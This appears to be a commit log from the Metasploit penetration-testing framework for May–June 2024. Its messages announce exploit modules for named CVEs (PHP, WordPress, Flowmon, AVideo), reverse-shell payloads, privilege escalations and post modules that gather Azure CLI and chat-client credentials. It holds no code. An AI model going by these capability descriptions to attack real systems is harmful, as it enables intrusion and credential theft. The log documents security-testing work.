v1.4.0 - v1.71.1 allow the Jypiter notebook to embed HTML and
javascript, which can then open new terminal windows within VSCode. Each
of these new windows can then execute arbitrary code at startup
2024-06-10 14:36:57 -07:00
sud0Ru 39b351554a Update module to support ruby_smb3.3.9 and support DB connection 2024-06-10 15:05:08 -04:00
sud0Ru 5c7b3753f8 Change the module adn the documentation path 2024-06-10 15:03:22 -04:00
adfoster-r7 e10d8e20f2 Add support for Ruby 3.4.0-preview1 2024-06-10 19:36:34 +01:00
sfewer-r7 bf9b3f1d2a add documentation 2024-06-10 17:41:55 +01:00
sfewer-r7 c6de00968f typo 2024-06-10 17:17:39 +01:00
sfewer-r7 3a19a54c59 remove dead link 2024-06-10 17:17:28 +01:00
sud0Ru 88d325775b Update documentation/modules/auxiliary/gather/nrpc_enumusers.md
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2024-06-10 18:43:01 +03:00
Jack Heysel 12b1936e16 Fixed typo added Options section docs 2024-06-10 07:39:24 -07:00
adfoster-r7 6498bfa6c6 Reintroduce windows acceptance tests 2024-06-10 13:07:35 +01:00
cgranleese-r7 bdeaa97cda Land #19246, Dry BUNDLER_WITHOUT config 2024-06-10 10:25:57 +01:00
h00die-gr3y 6a77c2e562 Final tweaks in check method 2024-06-08 11:33:55 +00:00
bwatters 2a271048ca Land #19248, Remove duplicated rescue
Merge branch 'land-19248' into upstream-master
2024-06-07 16:37:22 -05:00
h00die-gr3y 0e3471d543 Final draft 2024-06-07 19:47:06 +00:00
Spencer McIntyre 9f4c2f68c1 Land #19245, Add dledda-r7 to the mailmap 2024-06-07 13:32:23 -04:00
Zach Goldman 82ca91b351 remove duplicated rescue 2024-06-07 12:18:07 -05:00
Spencer McIntyre 13a24d9f5c Update the version extraction regex 2024-06-07 11:27:42 -04:00
adfoster-r7 b1381f54a1 Dry BUNDLER_WITHOUT config 2024-06-07 15:59:16 +01:00
sfewer-r7 998724f683 first commit for cve-2024-4577 2024-06-07 15:44:05 +01:00
sfewer-r7 e325d23526 first commit for cve-2024-4577 2024-06-07 15:43:40 +01:00
dledda-r7 cf18271dce dledda-mailmap 2024-06-07 09:51:41 -04:00
h00die b71bd1daad Update azure.rb 2024-06-07 08:54:59 -04:00
h00die 6dffb3aed5 Update azure_spec.rb 2024-06-07 08:54:17 -04:00
h00die 99b3b607cc Update azure_cli_creds.rb 2024-06-07 08:53:43 -04:00
Simon Janusz 9981a24a6c Land #19235, Fixes an issue where zip paths were not being created correctly for Java payloads 2024-06-07 12:45:44 +01:00
h00die-gr3y 55fa94995b Updated check method 2024-06-06 22:23:35 +00:00
h00die 7594a4103c moving azure_cli_files around and stubbing out content
Update azure lib with process_context_contents

Update azure_spec.rb

Update azure.rb

Update azure_spec.rb

Update azure_cli_creds.rb

fix lint warning

add function to print consolehost_history

print_consolehost_history spec updates

fixing azure_cli spec, and errors
2024-06-06 17:31:19 -04:00
Spencer McIntyre d4696c0487 Document the auth bypass module 2024-06-06 15:48:25 -04:00
Spencer McIntyre ba2732fa8a Add the dedicated auth bypass module 2024-06-06 13:46:21 -04:00
softScheck c7509d0a6c junos_phprc: HttpClientTimeout as default 2024-06-06 19:27:59 +02:00
sfewer-r7 c8208704be add in exploit module for CVE-2024-23692 2024-06-06 18:04:14 +01:00
Metasploit cc9c104bc8 automatic module_metadata_base.json update 2024-06-06 10:27:23 -05:00
adfoster-r7 bf177642b4 Land #19199, Improves UX for scanner/login modules 2024-06-06 16:03:17 +01:00
Simon Janusz 2fa1bc6b53 Land #19238, Routine security updates 2024-06-06 15:49:21 +01:00
e2002e 1b1e215cd6 Merge branch 'rapid7:master' into master 2024-06-06 16:37:42 +02:00
softScheck GmbH 0c69968e4f junos_phprc: removed commented out line
Co-authored-by: Simon Janusz <85949464+sjanusz-r7@users.noreply.github.com>
2024-06-06 16:03:35 +02:00
softScheck GmbH 769eb071cb junos_phprc: use faker IPv4
Co-authored-by: Simon Janusz <85949464+sjanusz-r7@users.noreply.github.com>
2024-06-06 16:03:00 +02:00
adfoster-r7 aab1e5c029 Routine security updates 2024-06-06 13:46:22 +01:00
adfoster-r7 2d77609063 Land #19236, bump rexml from 3.2.5 to 3.2.7 in /docs 2024-06-06 13:38:40 +01:00
dependabot[bot] 97e8e5ca02 Bump rexml from 3.2.5 to 3.2.7 in /docs
Bumps [rexml](https://github.com/ruby/rexml) from 3.2.5 to 3.2.7.
- [Release notes](https://github.com/ruby/rexml/releases)
- [Changelog](https://github.com/ruby/rexml/blob/master/NEWS.md)
- [Commits](https://github.com/ruby/rexml/compare/v3.2.5...v3.2.7)

---
updated-dependencies:
- dependency-name: rexml
  dependency-type: direct:production
...

Signed-off-by: dependabot[bot] <support@github.com>
2024-06-06 12:30:23 +00:00
adfoster-r7 d604d28b27 Land #19197, SQL sessions have correct history manager support 2024-06-06 12:53:30 +01:00
Metasploit a9078b4d68 Bump version of framework to 6.4.13 2024-06-06 03:33:45 -05:00
Simon Janusz b30641022f Land #19227, Moodle::Login.moodle_login: fix login success verification regex 2024-06-05 17:12:11 +01:00
cgranleese-r7 798d79ae32 Fixes an issue where zip paths were not being created correctly for Java payloads 2024-06-05 15:38:54 +01:00
e2002e 2a20894a27 Update zoomeye_search.rb
get rid of unnecessary includes
2024-06-05 15:53:50 +02:00
sjanusz-r7 adad32d442 Remove redundant 'require' for History Manager specs 2024-06-05 14:05:40 +01:00
Metasploit ddaa21d8c3 automatic module_metadata_base.json update 2024-06-05 03:42:42 -05:00
Christophe De La Fuente 120fa0f2fe Land #19208, Add exploit module for CVE-2024-5084: WordPress Hash Form Plugin RCE 2024-06-05 10:17:02 +02:00
Christophe De La Fuente 67ec4baa66 PR-19208: Add DefaultTarget to the info hash 2024-06-05 10:14:48 +02:00
James Otten e8571f23ed Fix typo 2024-06-04 19:52:02 -04:00
James Otten 37f7e17fd0 Add osx support to post/multi/gather/azure_cli_creds 2024-06-04 19:52:02 -04:00
James Otten 222ceb83f7 Add module documentation for post/multi/gather/azure_cli_creds 2024-06-04 19:52:02 -04:00
James Otten 1cd1ae5049 Add new module post/multi/gather/azure_cli_creds 2024-06-04 19:52:02 -04:00
h00die d7966104f2 touchup docs 2024-06-04 19:40:39 -04:00
Jack Heysel 9d47372fe6 rubocop 2024-06-03 15:43:25 -04:00
jheysel-r7 a8335478c7 Apply suggestions from code review
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2024-06-03 15:33:46 -04:00
softScheck 00ff617056 junos_phprc: session creation, old version switch, allow ssh root login, working timeouts 2024-06-03 18:33:06 +02:00
sjanusz-r7 91cb94e725 Add _close method to history manager, use generic method for Msf Config history file 2024-06-03 17:23:51 +01:00
adfoster-r7 36e29535a9 Land #19211, update db manager to no longer default updated_at to created_at value 2024-06-03 13:19:21 +01:00
sjanusz-r7 cf97b36d98 Align importing timestamps method with msf_ prefix 2024-06-03 11:09:59 +01:00
cgranleese-r7 60e5393102 Updates login/scanner modules to make use of ReportSummary mixin 2024-06-03 11:02:15 +01:00
cgranleese-r7 48f89a2aad Improves UX for scanner/login modules 2024-06-03 10:56:59 +01:00
sjanusz-r7 f7b69e2fe7 Fix service 'updated at' time not being updated correctly 2024-06-03 10:17:19 +01:00
e2002e 8f78c20f75 Update zoomeye_search.rb 2024-06-03 05:16:34 +02:00
bcoles 4eecb8ee96 Moodle::Login.moodle_login: fix login success verification regex 2024-06-03 01:49:04 +10:00
h00die b28f174be8 Add android link to issues template 2024-06-02 11:28:18 -04:00
PizzaHat c0e443e829 Update wp_ajax_load_more_file_upload.rb
Updated original author
2024-06-01 16:00:45 +02:00
remmons-r7 502cb565d6 Add CVE-2024-24919 markdown documentation 2024-05-31 14:33:45 -05:00
remmons-r7 7fdff871e4 Add Ruby module for CVE-2024-24919 2024-05-31 14:29:38 -05:00
Chocapikk 6b127249fa Add suggestions 2024-05-31 20:56:03 +02:00
Metasploit a92e37ecfb automatic module_metadata_base.json update 2024-05-31 12:58:12 -05:00
cgranleese-r7 27f5602685 Land #18776, Add osx aarch64 bind tcp payload 2024-05-31 18:28:24 +01:00
alanfoster 562e1dc453 Add osx aarch64 bind tcp payload 2024-05-31 18:21:24 +01:00
cgranleese-r7 4edb1e16ef Land #18652, Add osx aarch64 shell reverse tcp payload 2024-05-31 18:20:27 +01:00
alanfoster 7955381de5 Add osx aarch64 shell reverse tcp payload 2024-05-31 18:05:15 +01:00
cgranleese-r7 f2902b3efe Land #18646, Add osx aarch64 exec payload 2024-05-31 18:03:32 +01:00
alanfoster dbeeadefc7 Add osx aarch64 exec payload 2024-05-31 17:51:38 +01:00
Metasploit 28e34531de automatic module_metadata_base.json update 2024-05-31 09:36:46 -05:00
adfoster-r7 1281f4726f Land #19209, update fileformat modules to show the default template datastore values 2024-05-31 15:12:48 +01:00
adfoster-r7 3e75c42183 Land #19217, fix tab completion crash on Ruby 3.2 2024-05-31 13:44:02 +01:00
Metasploit ebfbd3d305 Bump version of framework to 6.4.12 2024-05-30 03:39:13 -05:00
Zach Goldman 2fb35f9700 adds eval patch to File 2024-05-29 15:04:21 -05:00
Jack Heysel d8d1ea7ffb Added on_new_session method 2024-05-29 16:04:00 -04:00
Metasploit bf8f1f95f8 automatic module_metadata_base.json update 2024-05-29 11:01:08 -05:00
Jack Heysel 80ee458410 Land #19151, Add Flowmon Priv Esc Feature Module
Privilege escalation module for Progress Flowmon unpatched feature
2024-05-29 11:35:53 -04:00
Zach Goldman 847b29178a change nil guards to default values, nil or blank guards for certain datastore options 2024-05-29 09:34:58 -05:00
adfoster-r7 2158f48148 Land #19214, Bump rexml from 3.2.6 to 3.2.8 2024-05-29 15:26:57 +01:00
Metasploit 4055d969ae automatic module_metadata_base.json update 2024-05-29 07:53:24 -05:00
dependabot[bot] 2f5d9ec585 Bump rexml from 3.2.6 to 3.2.8
Bumps [rexml](https://github.com/ruby/rexml) from 3.2.6 to 3.2.8.
- [Release notes](https://github.com/ruby/rexml/releases)
- [Changelog](https://github.com/ruby/rexml/blob/master/NEWS.md)
- [Commits](https://github.com/ruby/rexml/compare/v3.2.6...v3.2.8)

---
updated-dependencies:
- dependency-name: rexml
  dependency-type: indirect
...

Signed-off-by: dependabot[bot] <support@github.com>
2024-05-29 12:42:16 +00:00
Jack Heysel cc7aeb4364 Fix module cleanup 2024-05-29 08:39:06 -04:00
Jack Heysel 72f332aba0 Land #19150, Add Flowmon Command Injection Module
Unauthenticated Command Injection Module for Progress Flowmon
CVE-2024-2389
2024-05-29 08:28:37 -04:00
adfoster-r7 96396248f2 Land #19213, Use latest Ruby 3.3 releases during tests 2024-05-29 13:06:56 +01:00
adfoster-r7 93953313b2 Use latest Ruby 3.3 releases during tests 2024-05-29 12:29:21 +01:00
cgranleese-r7 58b2fd25cc Land #19200, Update gemspec to use require relative 2024-05-29 12:23:15 +01:00
cgranleese-r7 0ac8957922 Land #19198, Add support for Ruby 3.3.x 2024-05-29 12:22:32 +01:00
Jack Heysel e57f4d3cb5 Change xml to html in get_html_document 2024-05-28 16:29:55 -04:00
Jack Heysel 5d2a6aa4a1 Updated authors 2024-05-28 16:03:56 -04:00
Jack Heysel d60524d0b3 Started docs file 2024-05-28 15:54:47 -04:00
Jack Heysel 9955724f0a Fixed check method, responded to comments 2024-05-28 15:54:28 -04:00
Chocapikk 4fdf6df1e7 Fix doc 2024-05-28 20:16:33 +02:00
Chocapikk bea708d24c Add exploit module for CVE-2024-5084: WordPress Hash Form Plugin RCE 2024-05-28 18:27:02 +02:00
sjanusz-r7 487faf9a1a Allow History Manager writer thread to exit when queue is empty 2024-05-28 15:37:43 +01:00
sud0Ru 027d7ae423 Coreccting rubocop issues 2024-05-28 05:42:21 -04:00
sud0Ru a4d08f3cc3 adding Doc for domain users enumeration module through ms-nrpc interface 2024-05-27 15:43:19 -04:00
sud0Ru 369db16a10 adding domain users enumeration module through ms-nrpc interface 2024-05-27 15:36:31 -04:00
Jack Heysel d13ce0b1b8 rubocop fixes 2024-05-27 15:05:07 -04:00
h00die-gr3y e7d65fe60a Update based on bwatters-r7 comments 2024-05-27 17:45:07 +00:00
Jack Heysel 92b259981f Added WRITEABLE_DIR datastore option plus minor improvements 2024-05-27 12:48:17 -04:00
Metasploit 12d59e0a3d automatic module_metadata_base.json update 2024-05-27 04:53:04 -05:00
Christophe De La Fuente f274c46bd2 Land #19103, jasmin ransomware sqli and dir travers (CVE-2024-30851) 2024-05-27 11:23:42 +02:00
adfoster-r7 21bb4fc06f Update gemspec to use require_relative 2024-05-24 00:31:40 +01:00
Jack Heysel 2c6fc11639 Responded to comments, clean up /etc/sudoers file 2024-05-23 16:56:35 -04:00
Jack Heysel a0597007e4 Minor fixes, respond to comments 2024-05-23 14:02:28 -04:00
sjanusz-r7 82c43c3154 Allow HistoryManager to mock input library history 2024-05-23 17:50:19 +01:00
adfoster-r7 50a220b00f Add support for Ruby 3.3.x 2024-05-23 15:55:45 +01:00
sjanusz-r7 60c09e5ca3 SQL sessions have correct history manager support 2024-05-23 13:57:31 +01:00
Christophe De La Fuente 06cb6aa713 Update cacti_pollers_sqli_rce to use the new library
- Update the CSRF token logic in the library
- Update cacti_package_import_rce and cacti_pollers_sqli_rce modules
- Update the FETCH_DELETE logic in cacti_package_import_rce to only
  regenerate the payload when necessary
2024-05-23 11:30:48 +02:00
cgranleese-r7 d37a82500d Land #19195, Update nokogiri version 2024-05-23 10:21:06 +01:00
Metasploit 7eefa4b1ee Bump version of framework to 6.4.11 2024-05-23 03:34:03 -05:00
Dave Yesland 1b55b6512f Rubocop fixes 2024-05-22 12:43:27 -07:00
Christophe De La Fuente c6c5f2bf7a Add module, lib and documentation 2024-05-22 17:38:53 +02:00
dwelch-r7 7c908967fd Land #19194, Fix failing test with Ruby 3.4.0 2024-05-22 13:28:52 +01:00
adfoster-r7 0b0c5d10a8 Update nokogiri version 2024-05-22 13:06:31 +01:00
adfoster-r7 0695a6f2ce Fix test failing with Ruby 3.4.0 2024-05-22 12:26:53 +01:00
Dave Yesland b3bc4a6c68 Update progress_flowmon_sudo_privesc_2024.rb 2024-05-21 13:48:20 -07:00
Dave Yesland de99a74540 Update modules/exploits/linux/local/progress_flowmon_sudo_privesc_2024.rb
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com>
2024-05-21 13:45:36 -07:00
Dave Yesland 0de89d3b2d Update documentation/modules/exploit/linux/local/progress_flowmon_sudo_privesc_2024.md
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2024-05-21 13:42:52 -07:00
Dave Yesland 5a60a9a3d9 Update modules/exploits/linux/local/progress_flowmon_sudo_privesc_2024.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2024-05-21 13:42:43 -07:00
Dave Yesland a517a218ab Update modules/exploits/linux/local/progress_flowmon_sudo_privesc_2024.rb
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com>
2024-05-21 13:41:44 -07:00
Dave Yesland 90a0be67b6 Update modules/exploits/linux/local/progress_flowmon_sudo_privesc_2024.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2024-05-21 13:39:54 -07:00
Dave Yesland 1ddc60b185 Update modules/exploits/linux/local/progress_flowmon_sudo_privesc_2024.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2024-05-21 13:39:44 -07:00
h00die-gr3y 66a7fbf0ea Update based on jvoisin comments 2024-05-21 20:21:35 +00:00
Metasploit 422acd3145 automatic module_metadata_base.json update 2024-05-21 14:15:48 -05:00
Jack Heysel 6e9e4a5aed Land #19102, Northstar C2 Stored XSS to Agent RCE
Add exploit module for CVE-2024-28741, Northstar C2 Stored XSS to Agent
RCE
2024-05-21 14:57:44 -04:00
Metasploit 0cd62c5864 automatic module_metadata_base.json update 2024-05-21 13:44:31 -05:00
Jack Heysel 10acd86390 Land #19071, Add AVideo RCE module
Add module for CVE-2024-31819 which exploits an LFI in AVideo which uses
PHP Filter Chaining to turn the LFI into unauthenticated RCE
2024-05-21 14:27:15 -04:00
Metasploit 7a92eef81e automatic module_metadata_base.json update 2024-05-21 08:03:03 -05:00
dwelch-r7 65f0672c62 Land #19192, Fix crashing mipsle modules 2024-05-21 13:46:44 +01:00
adfoster-r7 6d2041b1cb Fix crashing mipsle modules 2024-05-21 12:52:12 +01:00
Metasploit c45f33eda4 automatic module_metadata_base.json update 2024-05-21 05:57:27 -05:00
cgranleese-r7 0c5a021ca7 Land #19189, Update ruby version 2024-05-21 11:32:39 +01:00
cgranleese-r7 67154a12e0 Land #19104, CHAOS rat xss to rce 2024-05-21 11:10:57 +01:00
adfoster-r7 c4e55f1493 Update ruby version 2024-05-20 17:55:10 +01:00
dwelch-r7 6301d840bb Land #19190, Disable pcaprb errors 2024-05-20 17:54:08 +01:00
adfoster-r7 73fdffbbc3 Disable pcaprb errors 2024-05-20 17:51:03 +01:00
adfoster-r7 40f7539ba0 Land #19186, don't show regular option groups when viewing advanced options 2024-05-20 15:57:56 +01:00
h00die-gr3y 575e223657 Added documentation 2024-05-19 14:09:58 +00:00
h00die-gr3y 31babb6ca1 Fixed disclosure date 2024-05-19 12:23:21 +00:00
h00die-gr3y 6d844ae9c8 first release module 2024-05-19 12:16:14 +00:00
Metasploit bbf096ee7e automatic module_metadata_base.json update 2024-05-17 17:07:16 -05:00
bwatters f8c69e434d Land #19173, Add CarotDAV FTP PackRat module
Merge branch 'land-19173' into upstream-master
2024-05-17 16:49:33 -05:00
Metasploit 9375102dbb automatic module_metadata_base.json update 2024-05-17 11:04:56 -05:00
bwatters 8a68eebbf6 Land #19171, Add Sylpheed Email PackRat module
Merge branch 'land-19171' into upstream-master
2024-05-17 10:39:56 -05:00
bwatters 20e083439c Land #19169, Add Adi IRC PackRat module
Merge branch 'land-19169' into upstream-master
2024-05-17 10:29:15 -05:00
The-Pink-Panther 9294d3bf5e Added Adi IRC and Windows version to documentation scenarios 2024-05-17 09:59:20 -05:00
Jacob 175e16a29a Removed unused regex search
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
2024-05-17 09:59:20 -05:00
Jacob a8f1d35773 Re-structured artifact enumeration option
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
2024-05-17 09:59:20 -05:00
Jacob 704de79d73 Fixed documentation formatting
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
2024-05-17 09:59:20 -05:00
Jacob 7088b39ecd Fixed rouge space
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
2024-05-17 09:59:20 -05:00
-Pink-Panther 3da09a0092 Added module documentation 2024-05-17 09:58:23 -05:00
-Pink-Panther 39630f1d2b Added post module for Adi IRC Client 2024-05-17 09:58:23 -05:00
Dean Welch ce49fa4e76 don't show regular option groups when viewing advanced options 2024-05-17 15:47:02 +01:00
Simon Janusz 28396ff23a Land #19002, Fix edgecase in Meterpreter job persistence 2024-05-17 14:22:51 +01:00
Metasploit 3a7574f3fc automatic module_metadata_base.json update 2024-05-17 08:09:07 -05:00
adfoster-r7 25a1318052 Land #19170, Refactor smb lookupsid module 2024-05-17 13:43:52 +01:00
Spencer McIntyre 638ad36b12 Fixed names that were missed while refactoring 2024-05-17 10:59:37 +01:00
sjanusz-r7 34ab7d97b2 Follow MS-LSAD and MS-LSAT spec for LSARPC & LookupSids 2024-05-17 10:59:37 +01:00
sjanusz-r7 138a553b36 Add support for configurable RPORT, session & default rports to lookupsid 2024-05-17 10:59:37 +01:00
sjanusz-r7 d569077564 Refactor smb_lookupsid module to use RubySMB 2024-05-17 10:59:37 +01:00
sjanusz-r7 b3799673ea Bump ruby_smb to 3.3.8 2024-05-17 10:59:37 +01:00
Metasploit 056acd4d72 automatic module_metadata_base.json update 2024-05-16 19:35:53 -05:00
bwatters d097ccfc7a Land #19166, Add Quassel IRC PackRat module
Merge branch 'land-19166' into upstream-master
2024-05-16 19:18:42 -05:00
The-Pink-Panther c8ce9dc168 Added Quassel IRC and Windows version to documentation scenarios 2024-05-16 19:15:00 -05:00
Jacob 6de0048354 Removed unused regex search
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
2024-05-16 19:15:00 -05:00
Jacob 698895cf7d Fixed rouge space
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
2024-05-16 19:15:00 -05:00
Jacob 7d8cd04086 Fixed documentation formatting
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
2024-05-16 19:15:00 -05:00
-Pink-Panther 41643073ee Added module documentation 2024-05-16 19:12:54 -05:00
-Pink-Panther d08247776c Re-arranged Author list 2024-05-16 19:12:54 -05:00
-Pink-Panther cf15b1f858 Added post module for Quassel IRC Client 2024-05-16 19:12:54 -05:00
Metasploit df7d31434f automatic module_metadata_base.json update 2024-05-16 17:25:08 -05:00
bwatters d54b3920b2 Land #19165, Add Halloy IRC PackRat module
Merge branch 'land-19165' into upstream-master
2024-05-16 16:59:47 -05:00
h00die a89d418725 review of northstar c2 2024-05-16 15:17:28 -04:00
adfoster-r7 0bba494d1d Fix edgecase in Meterpreter job persistence 2024-05-16 11:16:55 +01:00
Metasploit e3fdfd6c71 Bump version of framework to 6.4.10 2024-05-16 03:39:08 -05:00
Chocapikk da31761336 Lint 2024-05-15 22:13:53 +02:00
Valentin Lobstein 3900680a96 Update modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2024-05-15 22:07:45 +02:00
Valentin Lobstein 3560860e33 Update documentation/modules/exploit/multi/http/avideo_wwbnindex_unauth_rce.md
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2024-05-15 22:07:29 +02:00
Valentin Lobstein c815c2b15c Update modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2024-05-15 22:07:19 +02:00
Valentin Lobstein 7d2c06a246 Update modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2024-05-15 22:07:04 +02:00
Valentin Lobstein cd10c2d208 Update modules/exploits/multi/http/avideo_wwbnindex_unauth_rce.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2024-05-15 22:06:53 +02:00
adfoster-r7 306c66e12e Land #19183, Fix windows platform detection bug 2024-05-15 19:40:11 +01:00
Metasploit a5e2196e70 automatic module_metadata_base.json update 2024-05-15 13:26:44 -05:00
adfoster-r7 1fa8256a6d Fix windows platform detection bug 2024-05-15 19:17:40 +01:00
bwatters f3a8b35060 Land #19058, Add new Ldap session type
Merge branch 'land-19058' into upstream-master
2024-05-15 13:04:12 -05:00
Dean Welch 68f7334348 Fix kerberos auth and missing method error when querying with -a 2024-05-15 16:11:40 +01:00
Dean Welch 29c79fb499 Add handling of dead ldap sessions 2024-05-15 15:12:51 +01:00
Dean Welch 0cea2cba75 Add guard clause to not print out session info unless the session is enabled 2024-05-15 15:12:51 +01:00
Dean Welch 7cdea94000 Convert ldap modules to use the new ldap session type 2024-05-15 15:12:51 +01:00
Dean Welch e693b9588c Update ldap modules to support an ldap session 2024-05-15 15:12:51 +01:00
Dean Welch 55cb49c60e Add back in useful base dn discovery print out 2024-05-15 15:12:51 +01:00
Dean Welch df32ce2db9 Add ldap query support to the ldap session 2024-05-15 15:12:51 +01:00
Dean Welch 9e4f958af7 keep ldap connection open for use in a session 2024-05-15 15:12:51 +01:00
Dean Welch 3cedb20f75 Add initial ldap session support 2024-05-15 15:12:51 +01:00
The-Pink-Panther 22d16b91f2 Added Sylpheed and Windows version to documentation scenarios 2024-05-15 15:03:28 +01:00
Jacob 7a33970ef8 Re-structured artifact enumeration option
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
2024-05-15 14:58:51 +01:00
Jacob e6669ea94a Fixed documentation formatting
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
2024-05-15 14:58:40 +01:00
The-Pink-Panther b4d02ffe46 Added CarotDAV and Windows version to documentation scenarios 2024-05-15 14:56:24 +01:00
Jacob 554c5c3cb4 Re-structured artifact enumeration option
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
2024-05-15 14:52:58 +01:00
Jacob 4511bbfd17 Fixed documentation formatting
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
2024-05-15 14:51:42 +01:00
The-Pink-Panther 5bc9dd2c5d Merge remote-tracking branch 'origin/Halloy-Packrat-Module' into Halloy-Packrat-Module 2024-05-15 14:48:44 +01:00
-Pink-Panther a250477c0e Added Halloy and Windows version to documentation scenarios 2024-05-15 14:13:58 +01:00
Jacob 121d3ded85 Re-structured artifact enumeration option
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
2024-05-15 14:07:48 +01:00
Jacob 8259db4756 Removed unused regex search
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
2024-05-15 14:06:58 +01:00
Jacob fb74915074 Fixed formatting issues
Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
2024-05-15 14:06:15 +01:00
dwelch-r7 f6e7aacfb5 Land #19182, Disable the windows server 2022 test build 2024-05-14 18:49:53 +01:00
adfoster-r7 b9c09d7490 Fix windows build failures 2024-05-14 17:53:45 +01:00
h00die d1739f32c2 review of chaos rat 2024-05-13 16:55:43 -04:00
Metasploit 9c4849e5bd automatic module_metadata_base.json update 2024-05-13 14:58:09 -05:00
Spencer McIntyre 733c014223 Land #19115, read/write registry key SD
Module to read/write registry key security descriptor remotely
2024-05-13 15:41:54 -04:00
Metasploit 613ec3c9d3 automatic module_metadata_base.json update 2024-05-13 13:53:16 -05:00
Jack Heysel b1cd5b3476 Land #19132, Add LDAPS Channel Binding
Add channel binding information to Metasploits NTLM and Kerberos
authentication for the LDAP protocol. This enables users to authenticate
to domain controllers where the hardened security configuration setting
is in place
2024-05-13 11:31:10 -07:00
Jack Heysel 216ffec555 Add Linux compatibility 2024-05-13 10:11:56 -07:00
adfoster-r7 4233822965 Land #19172, Adds the features configuration to the debug command output 2024-05-13 12:55:44 +01:00
cgranleese-r7 7ee36ebc29 Adds a test for the new method 2024-05-13 11:19:37 +01:00
Christophe De La Fuente f1ee10f486 Code review #2 2024-05-13 12:01:54 +02:00
Jack Heysel 576191b34f beta commit 2024-05-10 09:01:58 -07:00
Metasploit 102f8d5476 automatic module_metadata_base.json update 2024-05-10 09:47:57 -05:00
Spencer McIntyre 80fdde5fdc Land #19100, Add Loadmaster sudo priv esc
Add Kemp Progress Loadmaster sudo abuse priv esc
2024-05-10 10:21:38 -04:00
bwatters b28e263a2b Update debug statements and add protection against bad die name 2024-05-10 08:54:23 -05:00
fufu 95ebf18691 Adding Arch parameter to dnn_cookie_deserialization_rce module 2024-05-09 23:09:03 +02:00
bwatters 948b18b08c Add a check to the file delete 2024-05-09 15:52:29 -05:00
Metasploit 2a8b36d432 Bump version of framework to 6.4.9 2024-05-09 07:11:01 -05:00
Spencer McIntyre 2bf402fa52 Add channel binding spec 2024-05-08 16:40:46 -04:00
Spencer McIntyre bef50de25a Update error handling for some LDAP modules 2024-05-08 16:40:34 -04:00
Spencer McIntyre 66d5e89046 Update ChannelBinding to check the algorithm 2024-05-08 16:30:29 -04:00
Spencer McIntyre 69e35005ee Add TLS channel binding for kerberos 2024-05-08 16:30:24 -04:00
Spencer McIntyre cc3fd3bfa0 Update #build_gss_ap_req_checksum_value
This updates the #build_gss_ap_req_checksum_value method to allow
control over the flags and channel binding information.
2024-05-08 16:24:54 -04:00
Spencer McIntyre 8dabe17121 Pass the ticket storage setting 2024-05-08 16:24:54 -04:00
Spencer McIntyre 942d47bec5 Add TLS channel binding for NTLM 2024-05-08 16:24:48 -04:00
-Pink-Panther 1326849076 Added post module & documentation for CarotDAV FTP Client 2024-05-08 10:54:33 -04:00
cgranleese-r7 c938b10067 Adds the features configuration to the debug command output 2024-05-08 15:35:21 +01:00
Spencer McIntyre a999ad49a0 Move the LDAP encryptors to their own files 2024-05-08 10:16:40 -04:00
-Pink-Panther c5500a3337 Added post module & documentation for Sylpheed email Client 2024-05-08 10:09:49 -04:00
Jacob 47f1623d6c Merge branch 'rapid7:master' into Halloy-Packrat-Module 2024-05-08 14:14:56 +01:00
adfoster-r7 1b9f24204a Land #19159, improve error handling for postgres platform/arch detection 2024-05-08 12:09:36 +01:00
-Pink-Panther b3f2904e75 Re-arranged Author list 2024-05-07 16:22:51 -04:00
-Pink-Panther ec04e62cce Fixed typo in module documentation 2024-05-07 15:47:07 -04:00
-Pink-Panther ceafa3761d Added module documentation 2024-05-07 15:02:48 -04:00
Metasploit 82ce0a9726 automatic module_metadata_base.json update 2024-05-07 13:52:43 -05:00
adfoster-r7 2ea116efea Land #19163, Allow setting the RPORT option for smb_version 2024-05-07 19:36:12 +01:00
-Pink-Panther 37c068a66e RuboCop Fixes 2024-05-07 13:25:52 -04:00
-Pink-Panther ee2ca6a35b Added post module for Halloy IRC Client 2024-05-07 12:51:25 -04:00
cgranleese-r7 3d044c4241 Fixes an issue were a regex mactch could have returned nil 2024-05-07 16:46:34 +01:00
Christophe De La Fuente 8c76143a9d Land #19127, Ldap signing 2024-05-07 17:28:36 +02:00
Spencer McIntyre 0863700f7a Try 445/tcp before 139/tcp when scanning smb 2024-05-07 10:54:35 -04:00
Spencer McIntyre 88efba7cbb Allow setting the RPORT option for smb_version 2024-05-07 10:17:15 -04:00
